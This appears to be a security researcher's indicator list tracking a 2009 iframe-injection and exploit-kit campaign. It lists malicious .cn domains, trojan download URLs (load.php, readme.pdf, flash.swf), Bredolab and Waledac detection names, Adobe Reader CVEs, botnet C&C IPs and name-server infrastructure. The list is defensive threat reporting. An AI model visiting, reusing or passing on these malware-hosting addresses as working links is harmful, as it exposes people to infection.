we have these domains currently live and kicking on a lot of websites
(simply entering a domain or "in.cgi?cocacola" in Google reveals a lot of discussion about
hacked, iframed domains.)

betstarwager.cn/in.cgi?cocacola Analysis
bestlotron.cn/in.cgi?cocacola Analysis
denverfilmdigitalmedia.cn/in.cgi?cocacola Analysis
diettopseek.cn/in.cgi?cocacola Analysis
filmlifemusicsite.cn/in.cgi?cocacola Analysis
filmlifemusicsite.cn/ Analysis
filmtypemedia.cn/in.cgi?cocacola Analysis
litedownloadseek.cn/in.cgi?cocacola Analysis
litetopfindworld.cn/in.cgi?cocacola Analysis
litetoplocatesite.cn/in.cgi?cocacola Analysis
nanotopfind.cn/in.cgi?cocacola Analysis
promixgroup.cn/in.cgi?cocacola Analysis
yourliteseek.cn/in.cgi?cocacola Analysis
   
ghrgt.hostindianet.com/index.php Analysis
lieliteautobody.cn/load.php?id=4
[94.247.3.151]
Anubis - VirusTotal
Botnet C&C: 213.155.4.82
Anubis Family 1175580
   
ghrgt.hostindianet.com/cache/readme.pdf Analysis
zzzz.hostindianet.com/load.php?id=4 Anubis - VirusTotal
Botnet C&C:
213.155.4.80
78.109.30.224
   

Also cited on Dancho Danchev's blog, here, in the series on iframed embassy websites (11 of them, including hostindianet[.]com)





On the next IP:

94.247.3.151 [hs.3-152.zlkon.lv]

hxxp://bigtopescorts.cn/in.cgi?id1000 (dead)  
hxxp://cheapslotplay.cn/in.cgi?income48 Redirect to exploit
hxxp://hyperliteautoservices.cn/index.php (dead)
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Anubis
hxxp://daddybigtop.cn
Load trojan on
hxxp://freeonlinehostguide.com/load.php
VirusTotal - Redirection Analysis - Anubis
Detection:
Trojan-Downloader.Win32.Bredolab!IK
TR/Crypt.ZPACK.Gen
Trojan-Downloader.Win32.Bredolab
Trojan:Win32/Meredrop

Using a stack overflow in Adobe Reader 8.1.2
CVE-2008-2992
hxxp://educationbigtop.cn VirusTotal Report (Bredolab)
hxxp://freehostinternet.com Load trojan on
hxxp://daddybigtop.cn/load.php
VirusTotal - Anubis
Detection:
Trojan-Downloader.Win32.Bredolab

Connect to botnet: 213.155.6.33
hxxp://freeonlinehostguide.com/
index.php
Load trojan on
hxxp://zzz.free.hostindianet.com/load.php?id=4
VirusTotal - Javascript Analysis - Anubis
Detection:
TR/Crypt.XPACK.Gen
Win32:Walpak
Win32/Kryptik.LI
Trojan.Waledac.Gen!Pac.8

It connects to a URL and drops the file "digiwet.dll"
Botnets C&C:
turokgame.cn [74.50.98.156]
94.247.2.95 and 78.109.30.224
hxxp://freewebhostguide.com Symantec
hxxp://greatbethere.cn Load trojan on
hxxp://greatbethere.cn/load.php?id=4
VirusTotal - Javascript Analysis - Anubis
Detection:
TR/Crypt.XPACK.Gen
Win32:Walpak
Win32/Kryptik.LI
Trojan.Waledac.Gen!Pac.8

Using a stack overflow in Adobe Reader 8.1.1 CVE-2007-5659

It connects to a URL and drops the file "digiwet.dll"
Botnets C&C:
213.155.6.32
78.109.30.224
hxxp://hugetopnonfat.cn dead
hxxp://mediahomenamemartvideo.cn/
in.cgi?income
Botnet C&C / redirect to exploit
hxxp://hyperliteautoservices.cn/index.php (dead)
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Redirection Analysis - Anubis
hxxp://hyperliteautoservices.cn Redirect to exploit
hxxp://hyperliteautoservices.cn/index.php
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Redirection Analysis - Anubis
Flash exploit is also live:

Flash Analysis
Botnet C&C: 78.109.29.112
hxxp://lieliteautobody.cn (dead)  
hxxp://liteautofinestsite.cn/load.php Exploit not found but trojan still there
hxxp://liteautofinestsite.cn/load.php
hxxp://liteautogreatest.cn Exploits
hxxp://liteautogreatest.cn/cache/readme.pdf
hxxp://liteautogreatest.cn/cache/flash.swf
to load trojan on
hxxp://liteautogreatest.cn/load.php
VirusTotal - Redirection Analysis - Anubis

Flash exploit is also live:
Flash Analysis - VirusTotal

Botnet C&C: 78.109.29.112
hxxp://liteautorepair.cn Exploit to load trojan on
zzzz.hostindianet.com/load.php?id=4
VirusTotal - Redirection Analysis - Anubis

Detection:
Trojan-Downloader.Win32.Bredolab

Botnet controller: 213.155.4.82
hxxp://litedownloadfinest.cn Exploit to load trojan on
zzzz.hostindianet.com/load.php?id=4
VirusTotal - Redirection Analysis - Anubis

Detection:
TrojanDownloader:Win32/Bredolab.B

Previous botnet controller: 78.109.29.112
hxxp://litehitscar.cn/index.php Exploit to load trojan on
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Redirection Analysis - Anubis

Detection:
Trojan.Botnetlog.3

Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82
hxxp://lieliteautobody.cn/load.php Exploit not found but trojan still there
lieliteautobody.cn/load.php
hxxp://liteautofinestsite.cn/load.php Exploit not found but trojan still there
liteautofinestsite.cn/load.php
hxxp://liteupyourride.cn/ Exploits
hxxp://liteupyourride.cn/cache/readme.pdf
hxxp://liteupyourride.cn/cache/flash.swf
to load trojan on
hxxp://litehitscar.cn/load.php
VirusTotal - Anubis

PDF exploit is also live:
PDF Analysis - VirusTotal

Botnet C&C: 78.109.29.112
hxxp://yournonfatbest.cn Exploit to load trojan on
farm-en-12san.hostindianet.com/load.php?id=4
VirusTotal - Redirection Analysis - Anubis

Detection:
TrojanDownloader:Win32/Bredolab.G

Botnets:
213.155.4.82
78.109.30.224
hxxp://lotbetsite.cn Exploit to load trojan on
casinoslotbet.cn/load.php - Analysis
VirusTotal - Anubis - Flash Exploit Analysis

Detection:
Trojan-Downloader.Win32.Bredolab

Botnet:
213.155.6.33
   
hxxp://hugetopnonfat.cn/in.cgi?id1000 Javascript Analysis
hxxp://PremiumNonfat.cn/all/
dead


94.247.3.150 [hs.3-150.zlkon.lv]

hxxp://autobestwestern.cn/
cache/readme.pdf
Exploit to load trojan on
litehitscar.cn/load.php?id=5 - Analysis
VirusTotal - Anubis - Flash Exploit Analysis

Detection:
TrojanDownloader:Win32/Bredolab.Q

Botnet:
78.109.29.112
hxxp://coolnameshop.cn/in.cgi?income 
hxxp://cutlot.cn/in.cgi?income Botnet C&C / Exploits to
hxxp://liteautogreatest.cn/index.php
Analysis
then load trojan located
hxxp://litehitscar.cn/load.php?id=5
VirusTotal - Anubis

Botnets:
78.109.29.112 - 78.109.30.224
hxxp://dotcomnameshop.cn Botnet C&C
hxxp://lotante.cn Botnet C&C / Exploits to litehitscar.cn/index.php
Analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82

hxxp://lotbetworld.cn/in.cgi?income Botnet C&C / Exploits to litehitscar.cn/index.php
[94.247.3.151]
Analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82

hxxp://homenameregistration.cn Botnet C&C / Exploits to 78.41.207.196/vertu/?t=5
Analysis
then load trojan located
78.41.207.196
Analysis
hxxp://hugetopnonfat.cn Botnet C&C
hxxp://dotcomnameshop.cn/
in.cgi?income
Botnet C&C / Redirect to exploits
hxxp://litehitscar.cn/index.php
[94.247.3.151]
Redirection Analysis - Exploit analysis
then load trojan located
hxxp://hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82

hxxp://japanhostnet.com/
in.cgi?income
Botnet C&C / Redirect to exploits litehitscar.cn/index.php
[94.247.3.151]
Redirection Analysis - Exploit analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82

hxxp://internetnamestore.cn/
in.cgi?income18
hyperliteautoservices.cn/index.php [94.247.3.151] Analysis
hxxp://lotmachinesguide.cn/
in.cgi?income
Redirects to exploits
hxxp://liteautogreatest.cn/cache/readme.pdf
hxxp://liteautogreatest.cn/cache/flash.swf
to load trojan on
hxxp://liteautogreatest.cn/load.php
VirusTotal - Redirection Analysis - Anubis

Botnet C&C: 78.109.29.112
hxxp://mainnameshop.cn Redirect to exploits sdfi.hostindianet.com/index.php (dead)

Detection: Win32/Bredolab.B
hxxp://mediahomenamemartvideo.cn Botnet C&C down (TS v3.2)
hxxp://mediahousenameshopfilm.cn 
hxxp://nameashop.cn/in.cgi?income On 2009-03-21 01:40:07 - Analysis
Redirect to exploit on
hxxp://sadcwed.hostindianet.com/index.php
On 2009-04-05 13:22:58 - Analysis
Redirect to exploit on
freeonlinehostguide.com/index.php
Analysis - VirusTotal - Anubis
Detection: Waledac - Kryptik.LI - Win32:Walpak Trojan.Crypt.XPACK.Gen
It connects to a botnet and drops the file "digiwet.dll"
Botnets:
turokgame.cn [74.50.98.156]
94.247.2.95 and 78.109.30.224
hxxp://namebrandmart.cn/in.cgi
?income18
litehitscar.cn/load.php Analysis
hxxp://namebuyline.cn Analysis
hxxp://namebuypicture.cn/
in.cgi?income31
Botnet C&C / redirect to exploit
hyperliteautoservices.cn/index.php (dead)
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Anubis - Analysis
hxxp://namesupermart.cn Botnet C&C
hxxp://namestorefilmlife.cn/
in.cgi?income
Botnet C&C / Exploits to litehitscar.cn
Analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
hxxp://perfectnamestore.cn
/in.cgi?income8
Redirect to exploit
hyperliteautoservices.cn/index.php (dead)
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Anubis
[94.247.3.151]
hxxp://playbetwager.cn/in.cgi?income
freeonlinehostguide.com/index.php
hxxp://superbetfair.cn/in.cgi?income Botnet C&C / Exploits to litehitscar.cn
Analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis - Redirection Analysis
Detection: Trojan.Botnetlog.3
hxxp://thelotbet.cn 
hxxp://yourfilmmovie.cn Botnet C&C


hxxp://freeonlinehostguide.com/index.php Analysis

Dns

AS48856
VENTREX-AS Ventrex LLP

95.129.144.210

freednshostway.com
ns1.bigtopescorts.cn
ns1.casinobigtop.cn
ns1.casinoslotbet.cn
ns1.cheapslotplay.cn
ns1.daddybigtop.cn
ns1.educationbigtop.cn
ns1.freednshostway.com
ns1.freehostinternet.com
ns1.freeonlinehostguide.com
ns1.freewebhostguide.com
ns1.greatbethere.cn
ns1.hostindianet.com
ns1.hyperliteautoservices.cn
ns1.lieliteautobody.cn
ns1.liteautofinestsite.cn
ns1.liteautorepair.cn
ns1.litehitscar.cn
ns1.lotante.cn
ns1.lotbetsite.cn
ns1.playbetwager.cn

AS34187
RENOME-AS Renome-Service: Joint Multimedia Cable Network Odessa, Ukraine

78.26.179.79

ns2.bigtopescorts.cn
ns2.casinobigtop.cn
ns2.casinoslotbet.cn
ns2.cheapslotplay.cn
ns2.daddybigtop.cn
ns2.educationbigtop.cn
ns2.freednshostway.com
ns2.freehostinternet.com
ns2.freeonlinehostguide.com
ns2.freewebhostguide.com
ns2.greatbethere.cn
ns2.hostindianet.com
ns2.hyperliteautoservices.cn
ns2.lieliteautobody.cn
ns2.liteautofinestsite.cn
ns2.liteautorepair.cn
ns2.litehitscar.cn
ns2.lotante.cn
ns2.lotbetsite.cn
ns2.playbetwager.cn